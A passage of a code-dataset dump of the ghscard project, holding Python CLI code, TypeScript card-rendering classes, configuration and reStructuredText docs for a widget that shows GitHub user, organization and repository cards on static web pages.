per_page=MAX_PER_PAGE)\n\n def generate_card(self, github_id: str) -> int:\n self.__set_github_id(github_id)\n\n output_path = self.__output_dir.joinpath(\n \"{:s}.json\".format(sanitize_filename(github_id, \"_\"), null_value_handler=raise_error)\n )\n if self.__cache_manager.is_cache_available(output_path):\n self.__logger.notice(f\"skip: valid card data already exist: {output_path}\")\n return 0\n\n try:\n with stopwatch(self.__logger, f\"fetch {github_id} {self.__data_fetcher.type}\"):\n card_data = self.__data_fetcher.fetch()\n except OSError as e:\n self.__logger.error(msgfy.to_error_message(e))\n return errno.ECONNRESET\n except BadCredentialsException:\n self.__logger.error(\"invalid GitHub API public access token\")\n return errno.EBADRQC\n except KeyboardInterrupt:\n self.terminate()\n raise\n except UnknownObjectException as e:\n if e.status == 404:\n message = \"'{}' {}\".format(self.__data_fetcher.id, e.data.get(\"message\"))\n else:\n message = e.data.message # type: ignore\n self.__logger.error(\n \"{:s} failed to get GitHub data: type={}, id={}, status={}, \"\n \"message={}\".format(\n e.__class__.__name__,\n self.__data_fetcher.type,\n self.__data_fetcher.id,\n e.status,\n message,\n )\n )\n return errno.ENODATA\n\n card_data_text = json.dumps(card_data, indent=self.__indent, ensure_ascii=False)\n\n self.__logger.debug(f\"fetched card data: {card_data_text}\")\n\n try:\n self.__make_output_dir()\n except TypeError:\n click.echo(card_data_text)\n return 0\n except OSError as e:\n self.__logger.error(msgfy.to_error_message(e))\n\n return e.args[0]\n\n try:\n with open(output_path, \"w\", encoding=\"utf-8\") as f:\n f.write(card_data_text + \"\\n\")\n except OSError as e:\n self.__logger.error(msgfy.to_error_message(e))\n return e.args[0]\n\n self.__logger.info(\n f\"written {self.__detector.get_id_type().lower():s} data to '{output_path:s}'\"\n )\n\n return 0\n\n def terminate(self) -> None:\n self.__data_fetcher.terminate()\n\n def __get_data_fetcher_class(self):\n # pytype: disable=attribute-error\n\n if self.__detector.is_repository():\n return RepositoryCardDataFetcher\n\n if self.__detector.is_user():\n return UserCardDataFetcher\n\n if self.__detector.is_organization():\n return OrganizationCardDataFetcher\n\n raise ValueError(f\"unknown id type: {self.__detector.id}\")\n # pytype: enable=attribute-error\n\n def __set_github_id(self, github_id: str) -> None:\n self.__github_id = github_id\n self.__detector = GithubIdDetector(\n self.__github_id, self.__logger, pygh_client=self.__pygh_client\n )\n self.__data_fetcher = self.__create_data_fetcher()\n\n def __create_data_fetcher(self) -> AbstractCardDataFetcher:\n # pytype: disable=attribute-error\n return self.__get_data_fetcher_class()(\n pygh_client=self.__pygh_client,\n ghc_client=GitHubClient(\n logger=self.__logger, github_id=self.__detector.id, access_token=self.__access_token\n ),\n id=self.__detector.id,\n logger=self.__logger,\n )\n # pytype: enable=attribute-error\n\n def __make_output_dir(self) -> None:\n if os.path.isdir(self.__output_dir):\n return\n\n self.__logger.debug(f\"creating directory: {self.__output_dir}\")\n\n os.makedirs(self.__output_dir)\n" }, { "alpha_fraction": 0.2539682686328888, "alphanum_fraction": 0.2698412835597992, "avg_line_length": 33.3636360168457, "blob_id": "1e02422f96e7d1ed281e43e0e39ac0b27543c7b5", "content_id": "a73041a5f17b1c075d325b24a35afd9322bfdedc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 378, "license_type": "permissive", "max_line_length": 56, "num_lines": 11, "path": "/docs/pages/environment.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Tested environment\n=======================\n\n.. table:: Tested Web Browsers\n\n ======================= ===========================\n Web browser Version\n ======================= ===========================\n ``Google Chrome`` ``57.0`` or newer\n ``Mozilla Firefox`` ``52.0`` or newer\n ======================= ===========================\n" }, { "alpha_fraction": 0.6678800582885742, "alphanum_fraction": 0.6693789958953857, "avg_line_length": 27.132530212402344, "blob_id": "d3bd799ac64fc7f83553344d6ccbadb75015abb5", "content_id": "5770862066c8ffa7d7f8ab44ba7927bd90053f7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4670, "license_type": "permissive", "max_line_length": 97, "num_lines": 166, "path": "/ghscard/__main__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nimport errno\nimport os\nimport sys\n\nimport appconfigpy\nimport click\nimport logbook\nimport logbook.more\nimport msgfy\nimport retryrequests\nimport typepy\nfrom appconfigpy import ConfigItem, ConfigManager, DefaultDisplayStyle\nfrom github.GithubException import RateLimitExceededException\n\nfrom .__version__ import __version__\nfrom ._const import PROGRAM_NAME, AppConfigKey\nfrom ._generator import CardGenerator\nfrom ._logger import get_logger\n\n\nQUIET_LOG_LEVEL = logbook.NOTSET\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"], obj={})\nCONFIG_ITEMS = [\n ConfigItem(\n name=AppConfigKey.GITHUB_API_ACCESS_TOKEN,\n initial_value=None,\n prompt_text=\"GitHub API Personal Access Token\",\n default_display_style=DefaultDisplayStyle.PART_VISIBLE,\n ),\n ConfigItem(\n name=AppConfigKey.OUTPUT_DIR, prompt_text=\"Output Directory Path\", initial_value=\".\"\n ),\n ConfigItem(name=AppConfigKey.INDENT, prompt_text=\"Indent Size\", initial_value=4),\n]\n\nlogbook.more.ColorizedStderrHandler(\n level=logbook.DEBUG, format_string=\"[{record.level_name}] {record.channel}: {record.message}\"\n).push_application()\n\n\nclass Context:\n LOG_LEVEL = \"LOG_LEVEL\"\n\n\ndef get_api_status() -> str:\n r = retryrequests.get(\"https://kctbh9vrtdwd.statuspage.io/api/v2/status.json\")\n\n r.raise_for_status()\n\n return r.json()[\"status\"][\"indicator\"]\n\n\[email protected](context_settings=CONTEXT_SETTINGS)\[email protected]_option(version=__version__, message=\"%(prog)s %(version)s\")\[email protected](\"--debug\", \"log_level\", flag_value=logbook.DEBUG, help=\"for debug print.\")\[email protected](\n \"--quiet\", \"log_level\", flag_value=QUIET_LOG_LEVEL, help=\"suppress execution log messages.\"\n)\[email protected]_context\ndef cmd(ctx, log_level):\n ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level\n\n\[email protected]()\[email protected]_context\ndef configure(ctx):\n \"\"\"\n Create a configuration file which includes GitHub API public access token.\n\n The value you provide for the GitHub API public access token written to\n the configuration file (~/.ghscard).\n\n Example:\n\n To create a new configuration:\n\n $ ghscard configure\n GitHub API Personal Access Token: <input access token>\n \"\"\"\n\n appconfigpy.set_log_level(ctx.obj[Context.LOG_LEVEL])\n\n app_config_mgr = ConfigManager(PROGRAM_NAME, CONFIG_ITEMS)\n\n sys.exit(app_config_mgr.configure())\n\n\[email protected]()\[email protected](\"github_id_list\", type=str, nargs=-1)\[email protected](\"--api-token\", default=None, help=\"GitHub API access token.\")\[email protected](\n \"-o\",\n \"--output-dir\",\n metavar=\"PATH\",\n default=None,\n help=\"Output path of the SQLite database file.\",\n)\[email protected](\n \"--overwrite\",\n \"is_overwrite\",\n is_flag=True,\n help=\"Overwrite card data even if data already exist and not expired.\",\n)\[email protected]_context\ndef gen(ctx, github_id_list, api_token, output_dir, is_overwrite):\n \"\"\"\n Generate a GitHub user/repository card data file.\n ID need to either '<user-name>' or '<user-name>/<repository-name>'.\n\n Example:\n\n $ ghscard gen thombashi/ghscard\n \"\"\"\n\n log_level = ctx.obj[Context.LOG_LEVEL]\n logger = get_logger(log_level, f\"{PROGRAM_NAME:s} gen\")\n appconfigpy.set_log_level(log_level)\n\n if get_api_status() == \"major\":\n logger.error(\"GitHub API status is in red status\")\n sys.exit(1)\n\n try:\n app_configs = ConfigManager(PROGRAM_NAME, CONFIG_ITEMS).load()\n except ValueError as e:\n logger.debug(msgfy.to_debug_message(e))\n app_configs = {}\n\n if typepy.is_not_null_string(output_dir):\n app_configs[AppConfigKey.OUTPUT_DIR] = output_dir\n\n if typepy.is_not_null_string(api_token):\n app_configs[AppConfigKey.GITHUB_API_ACCESS_TOKEN] = api_token\n elif os.environ.get(\"GITHUB_TOKEN\"):\n app_configs[AppConfigKey.GITHUB_API_ACCESS_TOKEN] = os.environ.get(\"GITHUB_TOKEN\")\n\n if not github_id_list:\n logger.error(\n \"command requires at least one argument: \"\n \"'<user-name>' or '<user-name>/<repository-name>'\"\n )\n sys.exit(errno.EINVAL)\n\n return_code_list = []\n generator = CardGenerator(logger, app_configs, is_overwrite)\n for gh_id in github_id_list:\n try:\n return_code_list.append(generator.generate_card(gh_id))\n except KeyboardInterrupt:\n sys.exit(errno.EINTR)\n except RateLimitExceededException as e:\n logger.error(e)\n sys.exit(errno.ENOSR)\n\n if any(return_code_list):\n sys.exit(1)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n cmd()\n" }, { "alpha_fraction": 0.5529606938362122, "alphanum_fraction": 0.5530713796615601, "avg_line_length": 28.917219161987305, "blob_id": "060bc372e276fd2ed93e299962fbcf4463bc57cf", "content_id": "72333f4515ec38947b7b847bfe647c331121d619", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 9035, "license_type": "permissive", "max_line_length": 99, "num_lines": 302, "path": "/src/card/base_user_org.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AVATAR_ELEMENT_ID } from \"../const\";\nimport { EmojiProcessorInterface } from \"../emoji\";\nimport { UiColor, UiSize, UserOrgCardDataKey } from \"../types\";\nimport { AbstractCardGerator } from \"./base\";\n\nexport class AbstractUserOrgCardGerator extends AbstractCardGerator {\n protected get avatarColumnWide(): string {\n throw Error(\"not implemented\");\n }\n\n protected get statsColumnWide(): string {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n return this.getCardData(\"html_url\");\n }\n\n protected get publicRepos(): string {\n return this.getCardData(\"public_repos\");\n }\n\n constructor(\n doc: Document,\n cardData: object,\n iframeWidth: number,\n color: string,\n emojiProcessor: EmojiProcessorInterface\n ) {\n super(doc, cardData, iframeWidth, color, emojiProcessor);\n }\n\n protected createStatisticsElement(): HTMLElement {\n throw Error(\"not implemented\");\n }\n\n protected getCardData(key: UserOrgCardDataKey): string {\n return this._cardData[key];\n }\n\n protected getScript(): string {\n return [\n `$('#${AVATAR_ELEMENT_ID}.ui.image').popup({`,\n \" on: 'hover',\",\n \" inline: true\",\n \"});\",\n \"$('.ui.images .image').popup();\",\n ].join(\"\\n\");\n }\n\n protected getColor(): UiColor {\n return this.toUiColor(this.color);\n }\n\n protected createCardContent(): HTMLElement {\n return this._createCardContent();\n }\n\n protected _createCardContent(): HTMLElement {\n const segmentClassName = \"ui vertical basic compact segment\";\n const content = this.createContentElement([this.createCardHeader()]);\n\n {\n const grid = this.createElement(\"div\", \"ui grid\");\n\n {\n const avatarColumn = this.createElement(\n \"div\",\n `${this.avatarColumnWide} wide center aligned column`\n );\n avatarColumn.appendChild(this.createAvatar());\n avatarColumn.appendChild(this.createPopup());\n grid.appendChild(avatarColumn);\n }\n\n {\n const statsColumn = this.createElement(\n \"div\",\n `${this.statsColumnWide} wide left aligned column`\n );\n const statsElement = this.createStatisticsElement();\n\n if (statsElement) {\n statsColumn.appendChild(statsElement);\n }\n\n grid.appendChild(statsColumn);\n }\n\n content.appendChild(this.createElementWithChild(segmentClassName, [grid]));\n }\n\n {\n const descriptionElement = this.createDescription(this.getCardData(\"description\"));\n if (descriptionElement) {\n content.appendChild(\n this.createElementWithChild(segmentClassName, [descriptionElement])\n );\n }\n }\n\n {\n const userInfoList = this.createUserInfoList();\n if (userInfoList) {\n content.appendChild(this.createElementWithChild(segmentClassName, [userInfoList]));\n }\n }\n\n return content;\n }\n\n protected _createCardContentTiny(): HTMLElement {\n const segmentStyle = \"ui vertical basic compact segment\";\n const content = this.createContentElement([this.createCardHeader()]);\n\n {\n const grid = this.createElement(\"div\", \"ui grid\");\n\n {\n const avatarColumn = this.createElement(\n \"div\",\n `${this.avatarColumnWide} wide center aligned column`\n );\n avatarColumn.appendChild(this.createAvatar());\n avatarColumn.appendChild(this.createPopup());\n grid.appendChild(avatarColumn);\n }\n\n {\n const userInfoColumn = this.createElement(\"div\", \"nine wide left aligned column\");\n userInfoColumn.appendChild(this.createUserInfoList());\n grid.appendChild(userInfoColumn);\n }\n\n const segment = this.createElement(\"div\", segmentStyle);\n segment.appendChild(grid);\n\n content.appendChild(segment);\n }\n\n {\n const bioElement = this.createDescription(this.getCardData(\"description\"));\n if (bioElement) {\n const segment = this.createElement(\"div\", segmentStyle);\n segment.appendChild(bioElement);\n\n content.appendChild(segment);\n }\n }\n\n return content;\n }\n\n protected createExtraCardContent(): HTMLElement {\n return null;\n }\n\n protected createAvatar(): HTMLElement {\n const avatar = this.createImageElement(\n this.getCardData(\"avatar_url\"),\n \"ui medium rounded image\"\n );\n avatar.id = AVATAR_ELEMENT_ID;\n\n return avatar;\n }\n\n protected createPopupInfoList(): HTMLElement {\n return this._createInfoList(\n {\n created_at: true,\n updated_at: true,\n },\n this.popupSize\n );\n }\n\n protected createCompanyElement(className: string): HTMLElement {\n const companyName = this.getCardData(\"company\");\n\n if (!companyName) {\n return null;\n }\n\n const company = this.createElement(\"div\", className);\n company.title = \"Company\";\n company.appendChild(this.createElement(\"i\", \"users icon\"));\n company.appendChild(\n this.createContentElement([this._doc.createTextNode(this.escapeHtml(companyName))])\n );\n\n return company;\n }\n\n protected createLocationElement(className: string): HTMLElement {\n const locationName = this.getCardData(\"location\");\n\n if (!locationName) {\n return null;\n }\n\n const location = this.createElement(\"div\", className);\n location.title = \"Location\";\n location.appendChild(this.createElement(\"i\", \"marker icon\"));\n location.appendChild(\n this.createContentElement([this._doc.createTextNode(this.escapeHtml(locationName))])\n );\n\n return location;\n }\n\n protected createBlogElement(className: string): HTMLElement {\n const url = this.getCardData(\"blog\");\n\n if (!url) {\n return null;\n }\n\n const blogLink = this.createAnchorElement(url, \"content\");\n blogLink.appendChild(this._doc.createTextNode(this.escapeHtml(url)));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"linkify icon\"),\n blogLink,\n ]);\n }\n\n protected createEmailElement(className: string): HTMLElement {\n return super._createEmailElement(this.getCardData(\"email\"), className);\n }\n\n protected _createInfoList(displayMapping: object, size: UiSize = null): HTMLElement {\n if (size === null) {\n size = this.infoSize;\n }\n\n const itemClassName = \"item\";\n const infoList = this.createElement(\"div\", `ui ${size} list`);\n\n if (displayMapping[\"company\"]) {\n const element = this.createCompanyElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"location\"]) {\n const element = this.createLocationElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"email\"]) {\n const element = this.createEmailElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"blog\"]) {\n const element = this.createBlogElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"created_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Joined on\", \"wait icon\", itemClassName)\n );\n }\n\n if (displayMapping[\"updated_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\n \"updated_at\",\n \"Updated at\",\n \"history icon\",\n itemClassName\n )\n );\n }\n\n if (infoList.children.length === 0) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Joined on\", \"wait icon\", itemClassName)\n );\n }\n\n return infoList;\n }\n\n protected createUserInfoList(): HTMLElement {\n return this._createInfoList({\n company: true,\n location: true,\n email: true,\n blog: true,\n });\n }\n}\n" }, { "alpha_fraction": 0.5648329854011536, "alphanum_fraction": 0.5785854458808899, "avg_line_length": 28.715328216552734, "blob_id": "0c25ae65711dddee96bfe00fd8d5fc5104a4deb4", "content_id": "7f463f2571a8d675977d536ccf67f3310588727b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4072, "license_type": "permissive", "max_line_length": 195, "num_lines": 137, "path": "/README.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. contents:: **ghscard**\n :backlinks: top\n :depth: 2\n\nSummary\n=========\n`ghscard <https://github.com/thombashi/ghscard>`__ is a JavaScript widget to generate interactive GitHub user/repository/organization cards for static web pages (like GitHub pages/Read the Docs).\n\n.. image:: https://badge.fury.io/py/ghscard.svg\n :target: https://badge.fury.io/py/ghscard\n :alt: PyPI package version\n\n.. image:: https://img.shields.io/pypi/pyversions/ghscard.svg\n :target: https://pypi.org/project/ghscard\n :alt: Supported Python versions\n\n.. image:: https://img.shields.io/npm/v/ghscard\n :target: https://www.npmjs.com/package/ghscard\n :alt: npm package version\n\n.. image:: https://img.shields.io/travis/thombashi/ghscard/master.svg?label=Linux%20CI\n :target: https://travis-ci.org/thombashi/ghscard\n :alt: Linux CI status\n\n.. image:: https://img.shields.io/github/stars/thombashi/ghscard.svg?style=social&label=Star\n :target: https://github.com/thombashi/ghscard\n :alt: GitHub stars\n\nDemo\n======\n- `Popular Repositories on GitHub <https://thombashi.github.io/ghscard/demo/>`__\n- https://thombashi.github.io/\n\nCLI Tool Installation\n====================================\nInstall ``ghscard`` CLI tool from `PyPI <//pypi.python.org/pypi>`__ via\n`pip <//pip.pypa.io/en/stable/installing/>`__ (Python package manager) command.\n\n::\n\n pip install ghscard\n\n\nDependencies\n====================================\n\nCLI Tool Dependencies\n----------------------\n- Python 3.5+\n- `Python package dependencies (automatically installed) <https://github.com/thombashi/ghscard/network/dependencies>`__\n\nQuick Start\n================\n\nGenerate card data files\n----------------------------------\nExecute ``ghscard gen`` command to generate a GitHub user/organization/repository card data file.\n\n::\n\n $ ghscard gen thombashi -o data\n [INFO] ghscard gen: written user data to 'data/thombashi.json'\n\n::\n\n $ ghscard gen Microsoft/TypeScript -o data\n [INFO] ghscard gen: written repository data to 'data/Microsoft_TypeScript.json'\n\n\nAdd widget to an HTML file\n----------------------------------\n\n:Example:\n .. code-block:: html\n\n <!doctype html>\n <html>\n <body>\n <table border=\"0\">\n <tr>\n <td>\n <div class='ghscard' src='data/thombashi.json'></div>\n </td>\n <td>\n <div class=\"ghscard\" src=\"data/Microsoft_TypeScript.json\"></div>\n </td>\n </tr>\n </table>\n\n <script src='//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js'></script>\n </body>\n </html>\n\nThe above HTML rendered as follows:\n\n:Output:\n .. image:: ss/quickstart.png\n :width: 600px\n :alt: Click to navigate to the HTML page\n :target: //thombashi.github.io/ghscard/quickstart/\n\nCDN\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n- Version specific\n - ``https://cdn.jsdelivr.net/npm/ghscard@<version>/dist/ghscard.min.js``\n - e.g. https://cdn.jsdelivr.net/npm/[email protected]/dist/ghscard.min.js\n- Latest version\n - https://cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\n\nFor more information\n----------------------\nMore examples are available at \nhttps://ghscard.rtfd.io/en/latest/pages/usage/index.html\n\nTested environment\n=======================\n\n.. table:: Tested Web Browsers\n\n ======================= ===========================\n Web browser Version\n ======================= ===========================\n ``Google Chrome`` ``57.0`` or newer\n ``Mozilla Firefox`` ``52.0`` or newer\n ======================= ===========================\n\nDocumentation\n---------------\nhttps://ghscard.rtfd.io/\n\nSponsors\n====================================\n.. image:: https://avatars0.githubusercontent.com/u/44389260?s=48&u=6da7176e51ae2654bcfd22564772ef8a3bb22318&v=4\n :target: https://github.com/chasbecker\n :alt: Charles Becker (chasbecker)\n\n`Become a sponsor <https://github.com/sponsors/thombashi>`__\n\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5012437701225281, "avg_line_length": 24.967741012573242, "blob_id": "5fa67475dd40d5047cff02b0dfdeecd147604e8b", "content_id": "4c488593cf52bc312171f3989405411e5126a8ce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JSON with Comments", "length_bytes": 804, "license_type": "permissive", "max_line_length": 49, "num_lines": 31, "path": "/tsconfig.json", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "{\n \"compilerOptions\": {\n \"module\": \"commonjs\",\n \"moduleResolution\": \"node\",\n \"target\": \"ES5\",\n \"removeComments\": true,\n \"outDir\": \"./js\",\n \"sourceMap\": true,\n \"esModuleInterop\": true\n },\n \"exclude\": [\n \"node_modules\"\n ],\n \"files\": [\n \"src/card/base.ts\",\n \"src/card/interface.ts\",\n \"src/card/repository/base_repository.ts\",\n \"src/card/repository/medium.ts\",\n \"src/card/repository/small.ts\",\n \"src/card/repository/tiny.ts\",\n \"src/card/user/base_user.ts\",\n \"src/card/user/medium.ts\",\n \"src/card/user/small.ts\",\n \"src/card/user/tiny.ts\",\n \"src/emoji.ts\",\n \"src/factory.ts\",\n \"src/main.ts\",\n \"src/manager.ts\",\n \"src/types.ts\"\n ]\n}" }, { "alpha_fraction": 0.7956521511077881, "alphanum_fraction": 0.7956521511077881, "avg_line_length": 27.75, "blob_id": "9879a4317a7624150f3420332ff85813e22e9e28", "content_id": "7fd0290fdb2bbb7d8b20675200a46b4adc52a9a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "permissive", "max_line_length": 54, "num_lines": 8, "path": "/ghscard/fetcher/__init__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom ._base import AbstractCardDataFetcher\nfrom ._organization import OrganizationCardDataFetcher\nfrom ._repository import RepositoryCardDataFetcher\nfrom ._user import UserCardDataFetcher\n" }, { "alpha_fraction": 0.6895306706428528, "alphanum_fraction": 0.6895306706428528, "avg_line_length": 24.18181800842285, "blob_id": "fc626e8a9d5efe9b41c4b8f3c511289a0f23913f", "content_id": "16b783854b9e4c8205688821b1b176eeefdfa9c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 277, "license_type": "permissive", "max_line_length": 79, "num_lines": 11, "path": "/docs/pages/links.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. include:: sponsors.rst\n\n\n.. include:: genindex.rst\n\n\nLinks\n=====\n- `GitHub repository <https://github.com/thombashi/ghscard>`__\n- `Issue tracker <https://github.com/thombashi/ghscard/issues>`__\n- `pip: tool for installing python packages <https://pip.pypa.io/en/stable/>`__\n" }, { "alpha_fraction": 0.6236323714256287, "alphanum_fraction": 0.6236323714256287, "avg_line_length": 21.850000381469727, "blob_id": "d78f84b68369d7bcf0876a9f8b290d3b3c7735c2", "content_id": "0644186d466b64a75ad3bb5be09548348646b844", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 457, "license_type": "permissive", "max_line_length": 68, "num_lines": 20, "path": "/src/card/user/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractUserCardGerator } from \"./base_user\";\n\nexport class MediumUserCardGerator extends AbstractUserCardGerator {\n protected get headerSize(): UiSize {\n return \"medium\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n protected get avatarColumnWide(): string {\n return \"nine\";\n }\n}\n" }, { "alpha_fraction": 0.5308219194412231, "alphanum_fraction": 0.6609588861465454, "avg_line_length": 40.71428680419922, "blob_id": "57c83434a1f94d971a5db3ecccc4733c0499ee32", "content_id": "7315f5b39f459692d37e96b89af3fde443380004", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 292, "license_type": "permissive", "max_line_length": 112, "num_lines": 7, "path": "/docs/pages/sponsors.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Sponsors\n====================================\n.. image:: https://avatars0.githubusercontent.com/u/44389260?s=48&u=6da7176e51ae2654bcfd22564772ef8a3bb22318&v=4\n :target: https://github.com/chasbecker\n :alt: Charles Becker (chasbecker)\n\n`Become a sponsor <https://github.com/sponsors/thombashi>`__\n" }, { "alpha_fraction": 0.5615799427032471, "alphanum_fraction": 0.5631213784217834, "avg_line_length": 31.196029663085938, "blob_id": "a4555a945ebac8a425d4e523da4567a05d95d93e", "content_id": "0a886f091abc85a2592e295b96c7f9ba96823b3e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 25950, "license_type": "permissive", "max_line_length": 100, "num_lines": 806, "path": "/src/card/repository/base_repository.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AVATAR_ELEMENT_ID } from \"../../const\";\nimport { EmojiProcessorInterface } from \"../../emoji\";\nimport { ElementDisplay, UiColor, UiSize, RepoCardDataKey } from \"../../types\";\nimport { AbstractCardGerator } from \"../base\";\n\nimport dayjs from \"dayjs\";\n\nnamespace CanvasId {\n export const COMMITS_CHART = \"__commits_chart_canvas__\";\n export const ISSUES_CHART = \"__issues_chart_canvas__\";\n export const LANGUAGES_CHART = \"__language_chart_canvas__\";\n}\n\nexport class AbstractRepositoryCardGerator extends AbstractCardGerator {\n protected get versionLabelSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get topicSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n return this.getCardData(\"html_url\");\n }\n\n private get language(): string {\n return this.getCardData(\"language\");\n }\n\n protected get lineChartHeight(): number {\n throw Error(\"not implemented\");\n }\n\n protected get pieChartHeight(): number {\n throw Error(\"not implemented\");\n }\n\n protected get pieChartLegendFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n protected get chartTitleFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n protected get chartTickFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n private get releaseTagColor(): UiColor {\n return \"blue\";\n }\n\n constructor(\n doc: Document,\n cardData: object,\n iframeWidth: number,\n color: string,\n protected chartDisplay: ElementDisplay,\n protected topicDisplay: ElementDisplay,\n emojiProcessor: EmojiProcessorInterface\n ) {\n super(doc, cardData, iframeWidth, color, emojiProcessor);\n\n this.colorMap = {\n a: \"red\",\n b: \"orange\",\n c: \"yellow\",\n d: \"olive\",\n e: \"green\",\n f: \"teal\",\n g: \"blue\",\n h: \"violet\",\n i: \"purple\",\n j: \"pink\",\n k: \"brown\",\n l: \"grey\",\n m: \"black\",\n n: \"red\",\n o: \"orange\",\n p: \"yellow\",\n q: \"olive\",\n r: \"green\",\n s: \"teal\",\n t: \"blue\",\n u: \"violet\",\n v: \"purple\",\n w: \"pink\",\n x: \"brown\",\n y: \"grey\",\n z: \"black\",\n };\n this.colorMap[\"C\"] = \"black\";\n this.colorMap[\"C++\"] = \"pink\";\n this.colorMap[\"Go\"] = \"teal\";\n this.colorMap[\"HTML\"] = \"red\";\n this.colorMap[\"Java\"] = \"brown\";\n this.colorMap[\"Swift\"] = \"orange\";\n this.colorMap[\"JavaScript\"] = \"yellow\";\n this.colorMap[\"Python\"] = \"blue\";\n this.colorMap[\"Ruby\"] = \"purple\";\n this.colorMap[\"Shell\"] = \"green\";\n }\n\n protected isDisplayChart(): boolean {\n if (this.chartDisplay === \"none\") {\n return false;\n }\n\n return true;\n }\n\n protected isDisplayCommitChart(): boolean {\n return this.isDisplayChart() && Number(this.getCardData(\"commits_last_year\")) > 0;\n }\n\n protected isDisplayTopic(): boolean {\n if (this.topicDisplay === \"none\") {\n return false;\n }\n\n if (this.getCardData(\"topics\") == null) {\n return false;\n }\n\n return this.getCardData(\"topics\").length > 0;\n }\n\n protected getScript(): string {\n const popupScript = [\n `$('#${AVATAR_ELEMENT_ID}.ui.image').popup({`,\n \"on: 'hover',\",\n \"inline: true,\",\n \"});\",\n ].join(\"\\n\");\n\n const scriptArray = [popupScript];\n\n if (this.isDisplayChart()) {\n scriptArray.push(\"$('.ui.accordion').accordion();\");\n scriptArray.push(this.getGlobalChartOption());\n scriptArray.push(this.createIssuesLabeChartScript());\n scriptArray.push(this.createLanguageLabeChartScript());\n\n if (this.isDisplayCommitChart()) {\n scriptArray.push(this.createCommitChartScript());\n }\n }\n\n return scriptArray.join(\"\\n\");\n }\n\n private getGlobalChartOption(): string {\n return \"Chart.defaults.global.defaultFontSize = 10;\";\n }\n\n private getPieChartOption(): object {\n return {\n responsive: false,\n legend: {\n position: \"right\",\n labels: {\n fontSize: this.pieChartLegendFontSize,\n },\n },\n };\n }\n\n private createIssuesLabeChartScript(): string {\n const issuesLabelArray = [];\n if (this.getCardData(\"has_issues\")) {\n for (const issueLabel of this.getCardData(\"open_issues\")[\"labels\"]) {\n issuesLabelArray.push(`'${issueLabel}'`);\n }\n }\n\n return `\nvar issuesCanvas = document.getElementById('${CanvasId.ISSUES_CHART}');\nif (issuesCanvas) {\n issuesCanvas.width = ${this.getChartWidth()};\n let myPieChart = new Chart(issuesCanvas, {\n type: 'pie',\n data: {\n labels: [${issuesLabelArray.join(\", \")}],\n datasets: [{\n data: [${this.getCardData(\"open_issues\")[\"data\"]}],\n backgroundColor: Please.make_color({\n colors_returned: ${this.getCardData(\"open_issues_count\")},\n }),\n }]\n },\n options: ${JSON.stringify(this.getPieChartOption())},\n });\n}`;\n }\n\n private createLanguageLabeChartScript(): string {\n const languageLabelArray = [];\n for (const languageLabel of this.getCardData(\"languages\")[\"labels\"]) {\n languageLabelArray.push(`'${languageLabel}'`);\n }\n\n return `\nvar languageCanvas = document.getElementById('${CanvasId.LANGUAGES_CHART}');\n\nif (languageCanvas) {\n languageCanvas.width = ${this.getChartWidth()};\n let myPieChart = new Chart(languageCanvas, {\n type: 'pie',\n data: {\n 